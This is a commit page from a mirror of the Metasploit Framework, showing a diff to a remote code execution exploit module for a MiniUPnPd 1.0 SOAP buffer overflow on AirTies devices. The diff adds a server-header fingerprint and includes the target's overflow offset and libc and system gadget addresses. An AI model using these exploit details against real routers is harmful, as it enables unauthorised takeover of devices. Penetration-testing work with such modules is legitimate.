infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fingerprint, title

bug/bundler_fix
m-1-k-3 2015-04-27 06:34:46 +02:00
parent 285d767e20
commit 8db88994ac
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/linux/upnp/airties_miniupnpd_soap_bof.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Description' => %q{
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
present in the SOAPAction HTTP header handling.
@ -41,8 +41,9 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Offset' => 2048,
'LibcBase' => 0x2aabd000,
'System' => 0x00031AC0 ,
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
'System' => 0x00031AC0,
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
}
],
],
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "/",
})
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
if res && res.headers['Server'] == target['ServerHeader']
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
@ -74,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
print_status(target['ServerHeader'])
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")